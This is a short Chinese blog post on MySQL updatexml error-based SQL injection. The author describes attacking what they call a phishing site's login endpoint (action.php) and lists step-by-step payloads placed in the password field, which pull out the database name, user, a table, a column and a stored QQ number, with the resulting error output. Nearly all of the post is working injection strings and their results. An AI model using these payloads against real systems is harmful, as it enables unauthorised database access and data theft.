web安全

MYSQL数据库updatexml报错注入

Admin 0

updatexml

  今天遇到一个钓鱼网站,整了好长时间,下面附上几个sql语句:

  获取数据库名:action.php?data={"username":"123456","password":"' or updatexml(0,concat(0x7e,database()),1) or '"}

  获取用户名:action.php?data={"username":"123456","password":"' or updatexml(0,concat(0x7e,user()),1) or '"} 得出a0827194442

  获取表名:data={"username":"123456","password":"' or updatexml(0,concat(0x7e,(select table_name from information_schema.tables where table_schema='a0827194442' limit 1)),1) or '"}得出data

  获取字段:action.php?data={"username":"123456","password":"' or updatexml(0,concat(0x7e,(select column_name from information_schema.columns where table_name='data' limit 1,1)),1) or '"}获取到 qq 原型输出:XPATH syntax error: '~qq'

  查内容:action.php?data={"username":"123456","password":"' or updatexml(0,concat(0x7e,(select concat(qq) FROM data limit 1,1)),1) or '"}得到qq里面的内容,原型输出:XPATH syntax error: '~1316402064'
注意:两个红色部分是控制读取哪个字段和字节的!

标签: updatexml报错注入

留言与评论(共有 0 条评论)
验证码: